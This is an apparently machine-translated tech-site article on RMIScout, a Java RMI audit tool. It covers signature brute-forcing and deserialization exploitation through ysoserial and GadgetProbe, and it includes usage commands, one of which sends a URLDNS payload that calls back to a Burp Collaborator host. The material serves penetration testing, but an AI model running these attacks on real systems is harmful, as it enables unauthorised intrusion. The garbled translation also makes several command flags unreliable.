Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to use RMIScout

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article mainly introduces "how to use RMIScout". In daily operation, I believe many people have doubts about how to use RMIScout. The editor consulted all kinds of materials and sorted out simple and easy-to-use operation methods. I hope it will be helpful to answer the doubts about "how to use RMIScout". Next, please follow the editor to study!

RMIScout

RMIScout is a security audit tool for Java RMI that enumerates Java RMI functions using dictionaries and blasting policies and exploits potential RMI parameter disassembly (Unmarshalling) vulnerabilities. In fact, RMIScout can perform dictionary-based brute force cracking attacks against the Java RMI interface and safely guess method signatures without calling any other methods.

On a server with misconfiguration, any known RMI signature will use a non-primitive type, such as java.lang.String, in which case an attacker will be able to exploit this vulnerability by converting an object to a serialized Payload. This misconfiguration is very common, such as VMWare vSphere Data Protection + vRealize Operations Manager, Pivotal tc Server and Gemfire, Apache Karaf + Cassandra, and so on.

RMIScout integrating ysoserial and GadgetProbe will be able to perform deserialization attacks against services that misconfigure the process-wide serialization filter (JEP 290).

Function introduction

1. Provide dictionaries and text-based blasting strategies instead of exploding 64-bit method hashes

2. Identify RMI methods without any method calls

3. A simple method is provided to exploit the known vulnerability of unsafe RMI parameter disassembly, and to integrate ysoserial.payloads.ObjectPayload with ysoserial or Payload.

4. Integrate GadgetProbe to identify remote classes to help identify related software and build gadget chains

To start the search, refer to the lists/prototypes.txt dictionary file that comes with the tool, which covers more than 15000 RMI prototypes.

Working mechanism

The RMI method can be identified without executing the RMI function, and RMIScout uses the underlying RMI network functions and dynamic class generation methods to send RMI calls with intentionally mismatched types to trigger remote exceptions. All parameters are replaced with dynamically generated serializable classes whose name is assumed to be 255 characters and does not exist in the remote classpath. For example:

Remote interface: void login (String user, String password) RMIScout will call: login ((String) new QQkzkn3..255 chars.. (), (String) new QQkzkn3..255 chars.. ())

If the target class exists, a remote java.rmi.UnmarshalException exception or parameter disassembly error issued by ClassNotFoundException will be triggered without the need to call the underlying method.

Complete technical manual: [click I get]

Tool download

The vast majority of researchers can use the following commands to clone the project source code locally:

Using the git clone https://github.com/BishopFox/rmiscout.git tool

For remote RMI services, use function prototype dictionaries to perform dictionary-based burst attacks:

. / rmiscout.sh wordlist-I lists/prototypes.txt

Use the method dictionary and other options to perform blasting attacks:

. / rmiscout.sh bruteforce-I lists/methods.txt-r void,boolean,long-p String,int-l 1Jet 4

Convert object derived types based on specific ysoserial Payload and Payload parameters:

. / rmiscout.sh exploit-s' void vulnSignature (java.lang.String a, int b)'- p ysoserial.payloads.URLDNS-c "http://examplesubdomain.burpcollaborator.net"-n registryName

Use GadgetProbe and a known signature to explode the remote classpath:

. / rmiscout.sh probe-s' void vulnSignature (java.lang.String a, int b)'- I. / GadgetProbe/wordlists/maven_popular.list-d "examplesubdomain.burpcollaborator.net"-n registryName

Build and run

The project code is built using the included rmiscout.sh automation, which encapsulates the java-jar statement:

. / rmiscout.sh wordlist-I lists/prototypes.txt

Alternatively, you can build the project source code manually, even with the traditional java-jar statement:

# Manually build JAR./gradlew shadowJarjava-jar build/libs/rmiscout-1.01-SNAPSHOT-all.jar wordlist-I lists/prototypes.txt tool use

Run the RMI demo server and use the demo/wordlist.txt dictionary file:

Cd demo./start.sh at this point, the study on "how to use RMIScout" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report